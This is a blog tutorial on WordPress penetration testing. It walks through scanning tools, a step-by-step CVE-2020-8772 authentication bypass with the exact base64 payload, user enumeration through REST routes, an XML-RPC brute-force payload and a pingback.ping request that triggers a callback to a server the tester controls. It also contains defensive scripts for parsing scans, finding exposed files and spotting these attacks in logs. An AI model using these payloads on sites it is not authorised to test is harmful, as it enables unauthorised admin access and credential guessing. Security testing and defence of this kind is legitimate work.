
Mastering WordPress Penetration Testing: A Step-by-Step Guide

In this comprehensive guide, we’ll explore various aspects of WordPress penetration testing. Starting with gathering information using tools like Wappalyzer and WPintel. We’ll then dive into WordPress penetration testing with tools such as NMAP, FFuF, Nuclei, and Wpscan to uncover vulnerabilities. We’ll discuss exploiting specific vulnerabilities, manual approaches like username enumeration, and XML-RPC vulnerabilities. Understanding Cross-Site Port Attacks (XSPA) will enhance our knowledge. Lastly, we’ll explore online platforms to scan WordPress sites, providing a complete view of WordPress security.

If you haven’t already, make sure to check out our article on creating a secure WordPress website for essential insights before continuing further.

WordPress

WordPress is a widely used, open-source content management system (CMS) that allows users to create and manage websites and blogs. Originally developed as a blogging platform, it has evolved into a versatile CMS used for a wide range of websites, from personal blogs to business websites, e-commerce stores, forums, and more. It’s built on PHP and uses a MySQL database to store content and configuration settings. WordPress is known for its user-friendly interface, extensibility, and vibrant community.

WordPress’s flexibility, ease of use, and extensive ecosystem of themes and plugins make it a popular choice for individuals and businesses seeking to establish an online presence without requiring advanced technical skills.

Gather Information – Browser Extensions

In this phase, we will gather information about the WordPress site using some basic browser extensions. With their help we will obtain details such as the WordPress version, the technologies used by the web application and the installed plugins, and, using a second extension, we will attempt basic tasks such as username enumeration and detecting vulnerable plugins or WordPress versions.

Wappalyzer

Wappalyzer, a versatile technology profiler, significantly enhances penetration testing. By revealing a website’s underlying technologies, including CMS, frameworks, programming languages, analytics tools, and more, it guides testers in crafting precise strategies. This information aids in vulnerability identification, attack vector selection, and overall testing accuracy, making Wappalyzer an essential tool for effective penetration testing. By harnessing the power of Wappalyzer, ethical hackers enhance their data-driven exploits, pinpoint vulnerabilities, and promote heightened cybersecurity for their clients.

In the scenario below, we’ve acquired insights into the versions of WordPress, PHP, and other pertinent technologies. These insights serve as valuable resources for penetration testers, enabling them to uncover potential security vulnerabilities associated with these specific versions.

[Screenshot: the Wappalyzer browser extension listing the detected technologies]

WPintel

WPintel is a game-changer, allowing testers to efficiently scan self-hosted WordPress sites and unveil crucial information such as version details, vulnerabilities, plugins, themes, user insights, and more. By providing this comprehensive data, WPintel equips penetration testers with the knowledge they need to strategize targeted attacks, efficiently exploit vulnerabilities, and enhance the overall effectiveness of the testing process.

Here are the capabilities you can leverage during your penetration testing:

  • Version Detection & Vulnerability Assessment: Identify the WordPress version and its associated vulnerabilities.
  • Themes & Plugins Insight: Obtain details about installed themes and plugins for potential exploitation.
  • User Enumeration Support: Facilitate username enumeration to identify possible targets.
  • User Registration: Verify if user registration is enabled on the site, aiding in accessing the site.
  • Path Disclosure Detection: Identify exposed paths and potential disclosure of sensitive site information.

[Screenshot: the capabilities of the WPintel browser extension]

WordPress Penetration Testing – Tools

WordPress penetration testing employs a suite of tools for rigorous security evaluation. NMAP scans for open ports, FFuF checks for any sensitive files by fuzzing, Nuclei hunts misconfigurations, and Wpscan scrutinizes WordPress-specific vulnerabilities. These tools collectively bolster website defenses against potential threats.

NMAP

Nmap is an open-source tool that’s indispensable for network exploration and security audits. It uncovers active devices, pinpoints services, and maps networks. Valuable for both administrators and security experts, Nmap enhances network understanding and strengthens defenses by revealing open ports, operating systems, and potential vulnerabilities.

Here are some of the most commonly used Nmap options:

  • -sS: TCP SYN scan (stealthy and fast)
  • -sV: Version detection
  • -p <port ranges>: Specify ports to scan
  • -A: Aggressive scan (OS detection, version detection, scripts)
  • -O: OS detection
  • -T<0-5>: Timing template for scan speed
  • --script <script>: Execute NSE scripts
  • -oN <filename>: Save output in normal format
  • -oX <filename>: Save output in XML format
  • -v: Increase verbosity
  • -h: Display help information

These options cover a range of essential tasks such as port scanning, version detection, OS detection, aggressive scans, and script execution. They provide a solid foundation for network exploration and security assessments using Nmap.

In the example provided below, we’ve utilized the -sS option. This option triggers a TCP SYN scan, a frequently employed method for scanning. A TCP SYN scan assists in discerning the status of TCP ports on a designated system, indicating whether they are open, closed, or being filtered by a firewall. From the received response, it’s evident that port 80 is accessible, and there’s an active service running on that specific port.

nmap -sS domain.com
[Screenshot: nmap scan results showing port 80 open]
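The -oN and -oX options matter more than they look: once the results of a scan are going to be tracked across engagements or diffed against the last run, the XML written by -oX is the form to parse. The script below is an added example written for this article, not code from the original post or from the Nmap project. It parses a constructed nmap XML fragment (NMAP_XML_SAMPLE, modelled on the port 80 result described above, with a filtered and a closed port added for contrast) and reports only the open ports per host; the names NMAP_XML_SAMPLE, open_ports and open_port_numbers are chosen here.

```python
import xml.etree.ElementTree as ET

# Constructed sample in nmap's -oX layout, mirroring the article's finding
# (port 80 open). Not real scan output; 203.0.113.10 is a documentation address.
NMAP_XML_SAMPLE = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sS -sV -oX scan.xml domain.com">
  <host>
    <status state="up" reason="syn-ack"/>
    <address addr="203.0.113.10" addrtype="ipv4"/>
    <hostnames><hostname name="domain.com" type="user"/></hostnames>
    <ports>
      <port protocol="tcp" portid="22">
        <state state="filtered" reason="no-response"/>
        <service name="ssh" method="table"/>
      </port>
      <port protocol="tcp" portid="80">
        <state state="open" reason="syn-ack"/>
        <service name="http" product="Apache httpd" version="2.4.41" method="probed"/>
      </port>
      <port protocol="tcp" portid="443">
        <state state="closed" reason="reset"/>
        <service name="https" method="table"/>
      </port>
    </ports>
  </host>
</nmaprun>
"""

def open_ports(xml_text):
    """Return {host: [(port, protocol, service, product, version), ...]} containing
    only ports whose state is 'open'; filtered and closed ports are skipped."""
    root = ET.fromstring(xml_text)
    result = {}
    for host in root.findall("host"):
        addr_el = host.find("address")
        name_el = host.find("hostnames/hostname")
        label = name_el.get("name") if name_el is not None else addr_el.get("addr")
        found = []
        for port in host.findall("ports/port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue
            svc = port.find("service")
            found.append((
                int(port.get("portid")),
                port.get("protocol"),
                svc.get("name", "") if svc is not None else "",
                svc.get("product", "") if svc is not None else "",
                svc.get("version", "") if svc is not None else "",
            ))
        result[label] = sorted(found)
    return result

def open_port_numbers(xml_text):
    """Flat, sorted list of open port numbers across all hosts; handy for diffing
    two scans of the same target."""
    return sorted(p[0] for ports in open_ports(xml_text).values() for p in ports)

if __name__ == "__main__":
    for host, ports in open_ports(NMAP_XML_SAMPLE).items():
        for port, proto, name, product, version in ports:
            print(f"{host} {port}/{proto} {name} {product} {version}".rstrip())
```

Against a real file, call open_ports(open("scan.xml").read()); keeping each scan's XML and comparing open_port_numbers between runs is a cheap way to notice a service that was not exposed last time.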

FFuF

First, what is fuzzing? Fuzzing is the automated process of supplying arbitrary inputs to an application in order to identify errors or unexpected behaviour. Discovering hidden directories and files on a web server also falls within the realm of fuzzing.

FFUF is an adaptable and multifunctional open-source fuzzing tool that serves a range of purposes. Its capabilities encompass a spectrum of functionalities, including general directory discovery with the flexibility to fuzz at any point within a URL, VHOST discovery even in the absence of DNS records, and comprehensive fuzzing employing diverse HTTP methods. This tool empowers users with the ability to uncover vulnerabilities and reveal insights that extend across various application landscapes.

In the example provided below, we’ve utilized the following command to perform fuzzing for a particular file on the endpoint. This command’s output will display results when a 200 OK response is encountered, due to the utilization of the -mc option.

ffuf -w wordlist.txt -u http://domain.com/FUZZ -mc 200
[Screenshot: FFuF scan results]

We used FFuF to look around the server for hidden files, which is what it is good at. Among its results we found a file named info.php, and opening it showed sensitive information about the PHP server. Tools like FFuF therefore help us find sensitive files on a server.

[Screenshot: the information disclosed by the info.php file]

Nuclei

Nuclei is used to send requests across targets based on a template, leading to zero false positives and providing fast scanning on a large number of hosts. Nuclei offers scanning for a variety of protocols, including TCP, DNS, HTTP, SSL, File, Whois, Websocket, Headless etc. With powerful and flexible templating, Nuclei can be used to model all kinds of security checks.

It is an open-source tool that encourages community contributions to the library of templates, and development of the codebase. This means whenever a new CVE is published, someone can create a Nuclei template and publish it for the security community to use.

In the example provided below, we’ve used the below command to start the scan on the WordPress site.

nuclei -u https://domain.com
[Screenshot: Nuclei scan results]

With Nuclei, we examined our WordPress website and uncovered important WordPress-related information, along with specific well-known vulnerabilities that could endanger the site. A notable finding was a file named adminer.php that is accessible to anyone on the internet. This file is the login page of Adminer, a PHP-based database administration tool. Nuclei's templates go well beyond this example: they can surface further issues and information of a similar nature, helping to improve the site's overall security and resilience.

[Screenshot: the exposed adminer.php login page]
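Both findings above, info.php from FFuF and adminer.php from Nuclei, are files that have no business being reachable on a production site, so once they are removed or blocked it is worth keeping a regression check that confirms they stay unreachable. The following Python is an added example, not code from the article or from either tool. It requests a short list of known-sensitive paths and reports those that answer 200 OK. SENSITIVE_PATHS, exposed_paths, http_status and the stub fake_fetch are names chosen here; fake_fetch is a constructed stand-in for a server that still serves the two files the article found. The check first requests a path that cannot exist, because a site that answers 200 for everything (a custom "not found" page served with the wrong status code) would otherwise report every path as exposed.

```python
import secrets
import urllib.error
import urllib.request

# Files the article found exposed (info.php, adminer.php) plus a few other
# commonly forgotten ones. Assumption: extend this list to match your own site.
SENSITIVE_PATHS = [
    "/info.php",
    "/adminer.php",
    "/phpinfo.php",
    "/wp-config.php.bak",
    "/.git/HEAD",
]

def http_status(url, timeout=5):
    """GET url and return the HTTP status code (None on connection errors).
    GET rather than HEAD, because HEAD is often blocked or answered differently."""
    req = urllib.request.Request(url, headers={"User-Agent": "exposure-check/1.0"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status
    except urllib.error.HTTPError as err:
        return err.code
    except urllib.error.URLError:
        return None

def exposed_paths(base_url, paths=SENSITIVE_PATHS, fetch=http_status):
    """Return the paths under base_url that answer 200 OK.

    `fetch` is injectable so the check can run offline against a stub.
    A random, non-existent path is requested first: if it also answers 200 the
    site returns 200 for everything, a status-based check is meaningless, and
    we refuse to report rather than flag every path."""
    base = base_url.rstrip("/")
    baseline = fetch(f"{base}/exposure-check-{secrets.token_hex(8)}")
    if baseline == 200:
        raise RuntimeError("site answers 200 for unknown paths; compare bodies instead")
    return [p for p in paths if fetch(base + p) == 200]

# Constructed stub: a server that still serves the article's two findings.
def fake_fetch(url):
    return 200 if url.endswith(("/info.php", "/adminer.php")) else 404

if __name__ == "__main__":
    for path in exposed_paths("http://domain.com", fetch=fake_fetch):
        print("exposed:", path)
```

Run it with the default fetch against a host you own after deploying a fix, and again as part of any deployment pipeline; an empty list is the expected result, and the RuntimeError tells you the site's 404 handling needs fixing before the check means anything.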

Wpscan

WPScan is a powerful and widely used security tool specifically designed for assessing the security of WordPress websites. Its comprehensive set of features makes it an essential tool for both website owners and security professionals. Some of the key features of WPScan include:

  • Vulnerability Detection: WPScan scans WordPress websites to identify vulnerabilities, security issues, and potential threats, helping users proactively address these concerns.
  • Theme and Plugin Scanning: The tool examines installed themes and plugins for known vulnerabilities, ensuring that any potential weaknesses in these components are identified and can be addressed promptly.
  • User Enumeration: WPScan can enumerate WordPress usernames, aiding in identifying potential points of entry for unauthorized access.
  • Password Brute-Force: It provides the ability to conduct password brute-force attacks, allowing website owners to test the strength of their passwords and take necessary precautions to prevent unauthorized access.
  • Database Enumeration: WPScan can retrieve sensitive information from the WordPress database, assisting in identifying data that might be at risk.
  • Version Detection: The tool can determine the version of WordPress being used, which is crucial for identifying if a website is running outdated software that might be vulnerable to known exploits.
  • Publicly Known Vulnerabilities: WPScan can compare WordPress installations against a database of publicly known vulnerabilities, helping users stay informed about the security status of their websites.
  • Integration with Other Tools: It supports integration with other security tools, enabling a more comprehensive analysis of WordPress website security.
  • Regular Updates: WPScan’s database of vulnerabilities is frequently updated, ensuring that users have access to the latest information on potential security risks.

In essence, WPScan serves as a crucial tool to safeguard WordPress websites by pinpointing vulnerabilities and providing insights that empower website owners and security professionals to make informed decisions about their site’s security measures.

In the example provided, I used the below command to run WPscan on the WordPress site. To see all the details, you should make an account on the WPscan website and use the token in the below command.

wpscan --url http://domain.com --api-token wpscan_token
[Screenshot: WPScan scan results]

We did a scan, and from that, WPscan discovered CVE-2020-8772 which is a critical vulnerability. Remember, we talked about WPScan before – it’s a strong tool for keeping WordPress safe. Whenever you do penetration testing, always consider using WPScan. Next, I’ll demonstrate how we can exploit the CVE-2020-8772 vulnerability.

Exploit CVE-2020-8772

1. This is the front part of the WordPress application. You can see that we have not logged into the admin panel of the WordPress site.

[Screenshot: the WordPress application's front page, not logged in]

2. Create the base64 code using the below JSON Payload.

Payload: {"iwp_action":"add_site","params":{"username":"admin"}}

Command: echo '{"iwp_action":"add_site","params":{"username":"admin"}}' | base64

3. Refresh the WordPress site and intercept the request using Burp Suite.

4. Prefix the base64 payload from the step above with the "_IWP_JSON_PREFIX_" string provided in the exploit, so that the full payload looks like this:

Payload: _IWP_JSON_PREFIX_eyJpd3BfYWN0aW9uIjoiYWRkX3NpdGUiLCJwYXJhbXMiOnsidXNlcm5hbWUiOiJhZG1pbiJ9fQo=

5. Right-click on the Burp Suite’s interceptor tab, and click on “change request method” to modify the request from GET to POST.

6. As shown below, replace the payload with the above payload.

[Screenshot: the request with the updated payload]

7. Click on “Intercept is on” to forward the request. Once you forward the request, you will see something like this.

[Screenshot: the response content after the payload is submitted]

8. Now, navigate to the homepage of the WordPress site. The attack was successful, and you now have access to the admin dashboard.

[Screenshot: the user now has admin access]

As evident, we have successfully accessed the admin panel without the need to input a username and password.

[Screenshot: the user has full admin access]
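The payload in step 4 has a fixed shape: the marker _IWP_JSON_PREFIX_ followed by base64 of the JSON from step 2. CVE-2020-8772 is an authentication bypass in the InfiniteWP Client plugin, and that shape is what a WAF rule or a request-log review can key on. The Python below is an added example, not part of the article: it decodes a request body of that form and classifies it, treating the add_site action the article uses as a bypass attempt. ARTICLE_PAYLOAD is the exact payload from step 4, BENIGN_SAMPLE is a constructed body with a made-up action standing in for the plugin's ordinary traffic, and the function and constant names are chosen here.

```python
import base64
import binascii
import json

IWP_PREFIX = "_IWP_JSON_PREFIX_"

# Exact payload from step 4 of the article: the prefix plus base64 of
# {"iwp_action":"add_site","params":{"username":"admin"}} (and echo's newline).
ARTICLE_PAYLOAD = "_IWP_JSON_PREFIX_eyJpd3BfYWN0aW9uIjoiYWRkX3NpdGUiLCJwYXJhbXMiOnsidXNlcm5hbWUiOiJhZG1pbiJ9fQo="

# Constructed body with a made-up action name ("get_stats" is not taken from the
# plugin): prefix plus base64 of {"iwp_action":"get_stats"}.
BENIGN_SAMPLE = "_IWP_JSON_PREFIX_eyJpd3BfYWN0aW9uIjoiZ2V0X3N0YXRzIn0="

# Actions the article shows being used for the bypass. Assumption: treat these
# as alert-worthy; any other action is classified as ordinary plugin traffic.
BYPASS_ACTIONS = {"add_site"}

def decode_iwp_body(body):
    """Return the decoded JSON object for a body of the form prefix + base64(JSON),
    or None when the body has no prefix or the remainder is not valid base64/JSON."""
    if not body.startswith(IWP_PREFIX):
        return None
    encoded = body[len(IWP_PREFIX):].strip()
    try:
        raw = base64.b64decode(encoded, validate=True)
        data = json.loads(raw.decode("utf-8"))
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None
    return data if isinstance(data, dict) else None

def classify_request(body):
    """'ignore' (no prefix), 'malformed' (prefix but undecodable remainder),
    'bypass-attempt' (prefix and a bypass action), or 'iwp' (other plugin traffic)."""
    if not body.startswith(IWP_PREFIX):
        return "ignore"
    data = decode_iwp_body(body)
    if data is None:
        return "malformed"
    if data.get("iwp_action") in BYPASS_ACTIONS:
        return "bypass-attempt"
    return "iwp"

if __name__ == "__main__":
    print(decode_iwp_body(ARTICLE_PAYLOAD))
    for body in (ARTICLE_PAYLOAD, BENIGN_SAMPLE, "action=heartbeat", IWP_PREFIX + "not-base64!"):
        print(classify_request(body))
```

The plugin's own management traffic uses the same prefix, so blocking on the prefix alone would break legitimate use; the signal is the decoded action together with the source of the request. The fix is updating (or removing an unused) plugin, and a classifier like this is for spotting attempts in the meantime and for confirming, from logs, whether the bypass was ever tried against a site.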

WordPress Penetration Testing – Manual

WordPress Penetration Testing involves a thorough evaluation of potential vulnerabilities within a WordPress setup. This includes WordPress Username Enumeration, which seeks to uncover valid usernames that could be exploited for unauthorized access. Additionally, it covers Common Vulnerabilities in XML-RPC, highlighting risks tied to the XML-RPC protocol commonly used in WordPress for remote communication. By addressing these aspects, organizations can enhance their WordPress security and guard against potential cyber threats.

Username Enumeration

User Enumeration refers to an attack where an intruder systematically examines a web application to uncover the login names associated with a WordPress-based website. Attackers use this technique to expose the usernames linked to a WordPress site.

For those assessing the security of WordPress sites, attention should be paid to REST endpoints. By default, the route /wp-json/wp/v2/users can list users. In the latest WordPress version, this reveals the username and encrypted email, a potential concern understood by experienced WordPress users.

Several methods for user enumeration are as follows:

?rest_route=/wp/v2/users
/wp-json/wp/v2/users

In the provided screenshot, you can observe the enumerated username that can be utilized for logging into the admin console. Once you have obtained the username, you can attempt a password brute force attack to discover the correct password associated with that username.

[Screenshot: the result of username enumeration]

Common Vulnerabilities in XML-RPC

XML-RPC in WordPress serves as an API, which stands for “application program interface.” Its purpose is to facilitate communication between your WordPress site and developers crafting mobile apps, desktop apps, and various other services. The WordPress XML-RPC API empowers developers to create applications on your behalf that mimic many of the actions achievable through the web interface when you’re logged into WordPress.

The primary vulnerabilities linked with XML-RPC encompass brute force attacks and port scanning. Let’s delve into how these actions are carried out and explore how they can be strategically employed when testing a WordPress site for potential vulnerabilities.

BruteForce attack

When you attempt to open the “xmlrpc.php” file located at http://domain.com/xmlrpc.php, this is the response you encounter.

[Screenshot: the xmlrpc.php response confirming XML-RPC is enabled on the server]

The first step is to send a POST request that asks the server which XML-RPC methods it supports, much like reading a menu before ordering: one of the listed methods may turn out to be usable in an attack. The request carries the body below, and the server answers with the list of methods enabled on it.

<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>
[Screenshot: the list of methods enabled on the server]

Check whether the following methods are present. If they are, the attack can proceed:

wp.getUsersBlogs
metaWeblog.getUsersBlogs
wp.getCategories

To carry out the brute-force attack, send the payload below in the POST request body. Known-valid usernames make this much more effective; you can obtain them with WPScan or through the WP-JSON / rest_route API described above.

<methodCall>
<methodName>wp.getUsersBlogs</methodName>
<params>
<param><value>admin</value></param>
<param><value>pass</value></param>
</params>
</methodCall>
[Screenshot: the 403 fault returned for an incorrect password]

Now, you can put this into Intruder and start trying the list of passwords one after another. When you type in the wrong password or the right one, the server will still show “200 OK.” But, you need to look at the size of the response message to figure out if the password is right or wrong. The response you get for the right password will look something like this:

[Screenshot: the response for a successful login with username and password]
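Both techniques just described, REST user enumeration and XML-RPC brute force, leave a distinctive trace in the web server's access log: enumeration is a GET to /wp-json/wp/v2/users or a query string containing rest_route=/wp/v2/users, and a brute-force run is a burst of POSTs to xmlrpc.php from one address. The script below is an added example rather than code from the article. It parses lines in the common/combined log format and reports, per source IP, which of the two patterns appears. SAMPLE_LOG is a constructed log using the documentation addresses 203.0.113.5 and 198.51.100.7; the threshold of 10 POSTs within 60 seconds is an assumption to tune to your own traffic, and the function and constant names are chosen here.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Apache/nginx combined log format:
# ip ident user [time] "METHOD path proto" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Both REST routes the article lists for user enumeration.
USER_ENUM_MARKERS = ("/wp-json/wp/v2/users", "rest_route=/wp/v2/users")

def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec

def detect(lines, xmlrpc_threshold=10, window=timedelta(seconds=60)):
    """Return {ip: [finding, ...]}: 'user-enumeration' for any hit on the users
    REST route, 'xmlrpc-brute-force' for at least xmlrpc_threshold POSTs to
    xmlrpc.php from one ip inside one window."""
    enum_ips = set()
    xmlrpc_posts = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        path = rec["path"]
        if any(marker in path for marker in USER_ENUM_MARKERS):
            enum_ips.add(rec["ip"])
        if rec["method"] == "POST" and path.split("?", 1)[0].endswith("/xmlrpc.php"):
            xmlrpc_posts[rec["ip"]].append(rec["ts"])
    findings = defaultdict(list)
    for ip in sorted(enum_ips):
        findings[ip].append("user-enumeration")
    for ip, stamps in xmlrpc_posts.items():
        stamps.sort()
        # Sliding window: does any run of xmlrpc_threshold POSTs fit inside window?
        for i in range(len(stamps) - xmlrpc_threshold + 1):
            if stamps[i + xmlrpc_threshold - 1] - stamps[i] <= window:
                findings[ip].append("xmlrpc-brute-force")
                break
    return dict(findings)

# Constructed access-log excerpt: one source enumerating users and then hammering
# xmlrpc.php, and one ordinary visitor whose single POST is a legitimate pingback.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /wp-json/wp/v2/users HTTP/1.1" 200 612 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Oct/2023:13:55:40 +0000] "GET /?rest_route=/wp/v2/users HTTP/1.1" 200 612 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Oct/2023:13:55:50 +0000] "GET /wp-json/wp/v2/posts HTTP/1.1" 200 8190 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Oct/2023:13:55:58 +0000] "POST /xmlrpc.php HTTP/1.1" 200 371 "-" "WordPress/6.3"',
] + [
    f'203.0.113.5 - - [10/Oct/2023:13:56:{sec:02d} +0000] "POST /xmlrpc.php HTTP/1.1" 200 403 "-" "python-requests/2.31"'
    for sec in range(12)
]

if __name__ == "__main__":
    for ip, findings in detect(SAMPLE_LOG).items():
        print(ip, ", ".join(findings))
```

Because XML-RPC answers a wrong password with HTTP 200 (the article's point about response size), the status column is useless here and the signal has to come from request rate; pair this with a rate limit on xmlrpc.php, or disable XML-RPC where nothing needs it.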

Cross Site Port Attack – XSPA

Cross-Site Port Attack (XSPA) exploits an application that fetches user-supplied URLs without verifying and sanitizing the target or the response it gets back from the remote server. Attackers supply URLs that make the application proxy requests to external servers, intranet devices, and the web server itself. This reveals service availability, such as open ports and banners, and can even extract data from remote services in unexpected ways.

You can use the below method to scan the server’s ports as well.

pingback.ping
[Screenshot: the pingback.ping method listed as enabled on the server]

If the pingback.ping method appears in the response, you can move forward and try to get a "pingback" to a server you control. Tools such as Burp Suite Collaborator, netcat, a Python HTTP server, or any other server will do; choose whatever you're comfortable with. Send the POST body below with your server's address filled in.

<methodCall>
<methodName>pingback.ping</methodName>
<params><param>
<value><string>http://<YOUR SERVER>:<port></string></value>
</param><param><value><string>http://<SOME VALID BLOG POST FROM THE SITE></string>
</value></param></params>
</methodCall>
[Screenshot: the error returned for the collaborator URL]

Now I have checked my collaborator client and got a successful DNS and HTTP request, so it was confirmed that the website is vulnerable to an XSPA attack.

[Screenshot: DNS and HTTP pingbacks received on Burp Collaborator]
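The three XML-RPC checks in this section (listing the methods, reading the 403 fault on a wrong password, and confirming pingback.ping is present) all come down to parsing a methodResponse, which Python's standard library does with xmlrpc.client.loads. The code below is an added example, not part of the article. It replaces the response-size heuristic with an explicit parse: risky_methods flags the methods the article tells you to look for in a system.listMethods reply, parse_response separates a fault from a result, and classify_login_response tells a credential rejection from a success so that failed wp.getUsersBlogs calls can be counted per client by a reverse proxy or log hook. LIST_METHODS_SAMPLE, FAULT_SAMPLE and SUCCESS_SAMPLE are constructed responses shaped like the ones WordPress returns; RISKY_METHODS and the function names are chosen here.

```python
import xmlrpc.client

# Methods the article says to look for in the system.listMethods reply, with the
# reason each one matters. Assumption: the notes are ours, not WordPress's.
RISKY_METHODS = {
    "wp.getUsersBlogs": "takes username/password: credential-guessing target",
    "metaWeblog.getUsersBlogs": "takes username/password: credential-guessing target",
    "wp.getCategories": "takes username/password: credential-guessing target",
    "pingback.ping": "fetches a caller-chosen URL: XSPA / port-scan primitive",
}

# Constructed reply to system.listMethods (shortened; a real reply is much longer).
LIST_METHODS_SAMPLE = """<methodResponse>
<params><param><value><array><data>
<value><string>system.listMethods</string></value>
<value><string>wp.getUsersBlogs</string></value>
<value><string>wp.getCategories</string></value>
<value><string>metaWeblog.getUsersBlogs</string></value>
<value><string>wp.getPosts</string></value>
<value><string>pingback.ping</string></value>
</data></array></value></param></params>
</methodResponse>"""

# Constructed fault of the kind returned for a wrong password: the HTTP status is
# still 200, but the body is an XML-RPC fault with code 403.
FAULT_SAMPLE = """<methodResponse>
<fault><value><struct>
<member><name>faultCode</name><value><int>403</int></value></member>
<member><name>faultString</name><value><string>Incorrect username or password.</string></value></member>
</struct></value></fault>
</methodResponse>"""

# Constructed success reply to wp.getUsersBlogs for valid credentials.
SUCCESS_SAMPLE = """<methodResponse>
<params><param><value><array><data>
<value><struct>
<member><name>isAdmin</name><value><boolean>1</boolean></value></member>
<member><name>url</name><value><string>http://domain.com/</string></value></member>
<member><name>blogid</name><value><string>1</string></value></member>
<member><name>blogName</name><value><string>Example blog</string></value></member>
</struct></value>
</data></array></value></param></params>
</methodResponse>"""

def parse_response(xml_text):
    """Parse a methodResponse body.
    Returns ('ok', value) for a result and ('fault', code, message) for a fault."""
    try:
        params, _method = xmlrpc.client.loads(xml_text)
    except xmlrpc.client.Fault as fault:
        return ("fault", fault.faultCode, fault.faultString)
    return ("ok", params[0] if params else None)

def risky_methods(list_methods_xml):
    """Return {method: reason} for every risky method the server advertises."""
    parsed = parse_response(list_methods_xml)
    if parsed[0] != "ok" or not isinstance(parsed[1], list):
        return {}
    return {m: RISKY_METHODS[m] for m in parsed[1] if m in RISKY_METHODS}

def classify_login_response(xml_text):
    """Classify the reply to a credentialed call such as wp.getUsersBlogs:
    'rejected' for a 403 fault, 'error' for any other fault, 'accepted' for a result."""
    parsed = parse_response(xml_text)
    if parsed[0] == "fault":
        return "rejected" if parsed[1] == 403 else "error"
    return "accepted"

if __name__ == "__main__":
    for method, reason in risky_methods(LIST_METHODS_SAMPLE).items():
        print(f"{method}: {reason}")
    print(classify_login_response(FAULT_SAMPLE), classify_login_response(SUCCESS_SAMPLE))
```

On the WordPress side, returning false from the xmlrpc_enabled filter turns XML-RPC off entirely, and the xmlrpc_methods filter can unset pingback.ping on its own if the rest of the API is still needed; either way, re-running risky_methods against your own site's system.listMethods reply confirms the change took effect.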

Online Websites to scan WordPress websites

There are websites that can help you check your WordPress website’s security for free. You just need to enter your website’s address, and these websites will show you the results.

Conclusion

In conclusion, securing your WordPress website is paramount in today’s digital landscape. This guide has equipped you with tools and techniques, from browser extensions to powerful testing tools like NMAP and Nuclei, to enhance your website’s resilience. By understanding vulnerabilities like XML-RPC and XSPA, you’re well-prepared to take proactive steps. Online platforms for scanning WordPress sites offer added layers of security. With this knowledge, you’re empowered to ensure a safe online presence for both you and your users.

Piyush Kumawat

Ethical Hacker || Penetration Tester || Gamer || Blogger || Application Security Engineer

This Post Has 2 Comments

  1. muqsit

    You have stated different ways to hack a WordPress website, so how do we protect our website against any of the attacks you listed above?